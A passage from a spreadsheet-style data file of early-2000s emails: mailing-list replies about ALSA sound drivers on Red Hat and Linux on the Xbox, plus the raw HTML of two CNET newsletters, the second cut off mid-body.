 &gt;     SBLive/emu10k1 soundcard?
 Near to none, it should be quite straightforward :
 http://freshrpms.net/docs/alsa/
 The only tricky part is editing the /etc/modules.conf file, but the ALSA
 Soundcard Matrix has a page for every supported card with a section you can
 most of the time simply copy and paste!
 I really think that with my ALSA packages, ALSA on Red Hat Linux has never
 been so easy! ;-)
 Cheers,
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.00 0.07 0.17, AC on-line, battery charging: 100% (1:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] cheap linux PCs
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;I'd normally never buy this but the Xbox is Eur300 on IOL's shop, a very
 &gt;large company are making a loss on it and:
 &gt;
 &gt;http://xbox-linux.sourceforge.net/articles.php?aid=1&amp;sub=Press%20Release%3A%20Xbox%20Linux%20Mandrake%209%20Released
 &gt;
 &gt;Mandrake has been released for it.
 isn't it 250 in Smyths?
 don't forget to add to that the modchip, and the time to put it on.
 (/me thinks unless you want 3d graphics, www.mini-itx.com is the way to go :))
 L.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Cell Phone Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/wr/442_cellphone_nwsltr.gif" width="442" height="60" border="0" alt="CNET Wireless Dispatch"&gt;&lt;br&gt;
 	&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=10 rowspan=2&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td  width=430&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
     &lt;/table&gt;	
 	&lt;/td&gt;
 	&lt;!-- Skyscraper column --&gt;
 	&lt;td width=160 rowspan=2&gt;
 &lt;!-- shopping  --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /shopping --&gt;
 	&lt;br&gt;&lt;!-- right column content --&gt;
 	&lt;!-- search form --&gt;
 	&lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 		&lt;form method="get" action="http://www.search.com/redirect"&gt;
 		&lt;tr valign=top&gt;&lt;td&gt;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value="http://wireless.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;Wireless
  			&lt;option value="http://cnet.search.com/search?tag=ex.wireless.dispatch.srch.cnet"&gt;All CNET
  			&lt;option value="http://www.search.com/search?tag=ex.wireless.dispatch.srch.web"&gt;The Web
 			&lt;/select&gt;&amp;nbsp;
 			&lt;input type=submit value="Go!"&gt;&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 		&lt;/form&gt;
 	&lt;/table&gt;&lt;p&gt;
 	&lt;!-- /search form --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;&lt;img src="http://home.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section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&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 		&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;!-- td width=252&gt; --&gt;&lt;td width=150&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
 			&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="4" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=170&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h1"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h1"&gt;Cell phones coming soon--updated&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td&gt;&lt;a href="#h2"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 					 	&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h2"&gt;Siemens S46&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr valign=top&gt;&lt;td width=15&gt;&lt;a href="#h3"&gt;&lt;img src="http://home.cnet.com/i/dp/arrow2.gif" alt="" width="10" height="12" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 						&lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#h3"&gt;Cell phone personality test--updated&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;img src="http://home.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;	
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=1 bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=240&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
 				&lt;div style="padding: 8px 0px 8px"&gt;&lt;font size="-1"&gt;&lt;b&gt;Wireless Top 5s&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 					&lt;ul&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4K4BZCu92fqfAgMcXea9R" &gt;Top 5 AT&amp;T Wireless cell phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRwVMcByfnODtxI8fiiuR" &gt;Top 5 Sprint PCS phones&lt;/a&gt;&lt;br&gt;
 					&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6M7v6-Dd5q0_HZB17WsR" &gt;Top 5 Verizon Wireless cell phones&lt;/a&gt;
 				&lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzA6N2rWEP26D_8gaZjMZR" &gt;All Top 5s&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;
 				&lt;img src="http://home.cnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 			&lt;/td&gt;
 			&lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 		&lt;tr valign=top&gt;&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;			
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/lx/sub_rev.gif" alt="Reviews &amp; Features" width="200" height="19" border="0"&gt;&lt;br&gt;
 		&lt;img src="http://home.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br /&gt;
 		 &lt;table cellpadding=0 cellspacing=0 border=0 width=100 align=left&gt;
 			&lt;tr&gt;&lt;td valign=top&gt;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB680bDpVz-EDvznhjonleR" &gt;
 				&lt;img src="http://a.r.tv.com/cnet.1d/i/p/030102sexycell.jpg" width="85" height="110" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt; 
 &lt;!--item 1--&gt;		
 &lt;a name="h1"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMbPRnDU24YOLpk6Td6yR" &gt;Cell phones coming soon--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Before you buy, see what products are on the horizon. We have pictures and release dates for upcoming models.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbHx8Luh3RXvLF34ULXPR" &gt;Read the story&lt;/a&gt; &lt;!-- &amp;nbsp;&amp;#124;&amp;nbsp;
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tyzz0TzfZsihsBSWgp7dR" &gt;Notify me when this is available&lt;/a&gt; --&gt;&lt;/b&gt;
 &lt;br clear="all"&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--item 2--&gt;
 &lt;a name="h2"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjIl7tBt2H3f2jvrqULcR" &gt;Siemens S46&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The company's second mobile for the U.S. market picks up where the stylish S40 left off. Like that earlier model, this one's a world phone with business-centric features. How impressive is it?
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1Lk4v_VD8-mhe2RYEVuRR" &gt;Read the review&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- center1 --&gt;
 &lt;!-- /center1 --&gt;
 &lt;img src="http://home.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;a name="h3"&gt;&lt;/a&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_MIL2wZ5znP-FdWuuFR" &gt;Cell phone personality test--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Choose among our five user profiles to find out what models best match your wireless persona. Take the test and see them all.
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWI7bDI79mkSWreAgRDc9R" &gt;Match your profile&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;
 &lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 	&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     	&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             &lt;UL&gt;&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7SMgUa9xv3orMjEsaQuR" &gt;Live tech help; submit your question now&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzzAozoCPhKQcaLlAI6OFR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBTkDsKJTiMEyR1N6759R" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-e5sucLVdngyV7VDjSuR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 				&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0Ww9Y9Z-jekHF6q-jPexAdR" &gt;May Editors' Choice award: Pioneer's home-theater system, the HTS-910DV&lt;/A&gt; 
 			&lt;/UL&gt;
 			&lt;/B&gt;&lt;/FONT&gt;
 		&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 &lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Horizontal Brick--&gt;
 	&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- &lt;br&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="30" border="1"&gt;&lt;br&gt; --&gt;
 &lt;/td&gt;&lt;/tr&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=da-dTJjrXPTli245dErrRXDJA8_V-mXgdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvchl1BEqBxDVAmoBamZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXF_MUUdg98BbBL7kOi_dR"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href="http://clickthru.online.com/Click?q=19-BLe0I2rXOlAdMmyKMZ2Fz8IR7XcR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vCGRWxtktQ3DlPfP8NRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAEL8O_rz9Z5VKc-3P0BlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwfih9COYjKHbtbXYzH4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKM851-O7Bc1bJBykEmeR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lcv78gMtuoAABMMPZ9FR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e459&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=98-FTtO-Wz561TdRdZcPOtuqPuN0dRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Cable companies cracking down on Wi-Fi&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#e5e5e5"&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
     &lt;td width=442 colspan=4 bgcolor="#e5e5e5"&gt;
         &lt;img src="http://home.cnet.com/i/ne/ds/dhed.gif" alt="" width="442" height="63" border="0"&gt;&lt;br&gt;
     &lt;/td&gt;
     &lt;td width=160 rowspan=2&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;tr&gt;&lt;td align=center bgcolor="#e5e5e5"&gt;
 		&lt;img src="http://home.cnet.com/i/ne/ds/ad.gif" alt="" width="107" height="16" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;
 &lt;!-- Towerboard --&gt;
 	&lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /Towerboard --&gt;
 	&lt;p&gt;
 	&lt;!-- search form --&gt;
 	&lt;TABLE border=0 cellPadding=2 cellSpacing=0 width=150&gt;
 	&lt;TR&gt;
 	&lt;TD&gt;
 	&lt;form method="GET" action="http://www.search.com/redirect/"&gt;
 	                &lt;img src="/b.gif" width=1 height=4&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;br&gt;&amp;nbsp;&lt;b&gt;Search&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 	                &amp;nbsp;&lt;input type="text" name="q" size="15" value=""&gt;&lt;br&gt;
 	                &amp;nbsp;&lt;select name="target"&gt;
 	                &lt;option value="http://news.search.com/search?tag=ex.ne.newsletter.srch.ne" selected&gt;News.com
 	                &lt;option value="http://cnet.search.com/search?tag=ex.ne.newsletter.srch.cnet"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 	                &lt;option value="http://www.search.com/search?tag=ex.ne.newsletter.srch.web"&gt;The Web
                 &lt;/select&gt;&amp;nbsp;&lt;input type="submit" value="Go!" name="submit"&gt;&lt;/td&gt;&lt;/form&gt;
     &lt;/tr&gt;&lt;/table&gt;
     &lt;!-- /search form --&gt;
     &lt;p&gt;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href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnTHdcorsxoLkkTKhn-yR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2F1YRa96fez6pa6cIJPR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSN6JNEnCRYG8Y0gSPZxnR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVNIV5FkUMBXB6W5WWcR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJG9vEv5HSCN0U7nQUDRR" &gt;ZDNet: PeopleSoft&lt;/a&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 		&lt;p&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#e5e5e5"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="50" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffcc00"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;&lt;img src="http://home.cnet.com/i/ne/ds/bkg.gif" width="1" height="50" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;!-- In the News / Special Reports --&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 &lt;!-- START COPY FOR THE GUTS --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#eeeeee"&gt;
 	&lt;tr valign=top&gt;
 	&lt;td width=10&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=252&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=252&gt;
 	&lt;tr&gt;
 	&lt;td&gt;&lt;img src="http://home.cnet.com/i/ne/ds/itn.gif" alt="In the News" width="68" height="16" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 	&lt;td align=right&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 9, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Cable companies cracking down on Wi-Fi&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Apple's iPod comes to Linux&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Talk of Dell printer move heats up&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft eyes Visa users with Passport&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Judge OKs suit against Kazaa parent&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 China wakes to new destiny&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 		&lt;/td&gt;
 		&lt;td width=8&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=1 bgcolor="#999999"&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=159&gt;
 &lt;!-- Promo Area --&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=159&gt;
 		&lt;tr valign=bottom&gt;
 			&lt;td width="8"&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width="8"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/bug.gif" alt="" width="8" height="24" border="0"&gt;&lt;/td&gt;
 			&lt;td width="151"&gt;&lt;font face="Arial, Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 			&lt;td colspan=2 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=1&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 		&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 		&lt;tr&gt;&lt;td&gt;
 				&lt;font face="Arial, Helvetica" size="-1"&gt;
 			Read News.com's exclusive interviews of 10 top CIOs, including IBM's Phil Thompson.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xK4xfxgqJzDxDXozLCdR" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;
 &lt;!-- /Promo Area --&gt;
                                 &lt;img src="http://home.cnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
                         &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;/table&gt;
         &lt;!-- Thin grey line --&gt;
         &lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
         &lt;tr valign=top&gt;
                 &lt;td bgcolor="#999999"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 &lt;a name="h1"&gt;&lt;/a&gt;
